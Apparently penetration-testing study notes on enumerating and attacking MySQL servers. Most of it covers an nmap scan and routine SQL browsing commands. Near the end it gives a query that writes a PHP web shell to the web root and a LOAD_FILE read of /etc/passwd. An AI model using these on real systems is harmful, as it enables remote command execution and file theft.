My Structured Query Language
Footprinting The Service
sudo nmap 10.129.14.128 -sV -sC -p3306 --script mysql*


Interaction with the MySQL Server
mysql -u root -pP4SSw0rd -h 10.129.14.128

Commands
mysql -u <user> -p<password> -h <IP address>
Connect to the MySQL server. There should not be a space between the '-p' flag, and the password.
show databases;
Show all databases.
use <database>;
Select one of the existing databases.
show tables;
Show all available tables in the selected database.
show columns from <table>;
Show all columns in the selected database.
select * from <table>;
Show everything in the desired table.
select * from <table> where <column> = "<string>";
Search for needed string
in the desired table.
Dangerous Settings
user
Sets which user the MySQL service will run as.
password
Sets the password for the MySQL user.
admin_address
The IP address on which to listen for TCP/IP connections on the administrative network interface.
debug
This variable indicates the current debugging settings
sql_warnings
This variable controls whether single-row INSERT statements produce an information string if warnings occur.
secure_file_priv
This variable is used to limit the effect of data import and export operations.
MySQL
default system schemas/databases:
mysql
- is the system database that contains tables that store information required by the MySQL serverinformation_schema
- provides access to database metadataperformance_schema
- is a feature for monitoring MySQL Server execution at a low levelsys
- a set of objects that helps DBAs and developers interpret data collected by the Performance Schema
Write Local File
SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php';

File Write Privileges
show variables like "secure_file_priv";

secure_file_priv
variable is empty, which means we can read and write data using MySQLRead Local File
select LOAD_FILE("/etc/passwd");

MySQL
installation does not allow arbitrary file read, but if the correct settings are in place and with the appropriate privileges, we can read filesLast updated